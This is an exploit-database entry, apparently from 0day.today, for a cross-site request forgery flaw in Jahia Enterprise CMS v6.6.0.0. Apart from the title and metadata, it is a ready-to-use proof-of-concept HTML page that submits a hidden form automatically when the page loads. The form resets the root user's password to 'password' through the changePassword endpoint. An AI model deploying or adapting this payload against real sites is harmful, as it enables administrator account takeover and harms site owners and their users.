Jahia Enterprise v6.6.0.0 CSRF Vulnerability

2012-12-09T00:00:00
ID 1337DAY-ID-19925
Type zdt
Reporter D4RKCR1PT3R
Modified 2012-12-09T00:00:00

Description

Exploit for jsp platform in category web applications

                                        
                                            A.B.C.D = URL, EXAMPLE: http://localhost:8080/cms/en/users/root.changePassword.do
<html>
 <body onload="javascript:document.forms[0].submit()">
 <H2>CSRF Exploit to change Password</H2>
 <form method="POST" name="form0" action="A.B.C.D">
 <input type="hidden" name="password" value="password"/>
 <input type="hidden" name="passwordconfirm" value="password"/>
</form>
</html>

#  0day.today [2016-04-20]  #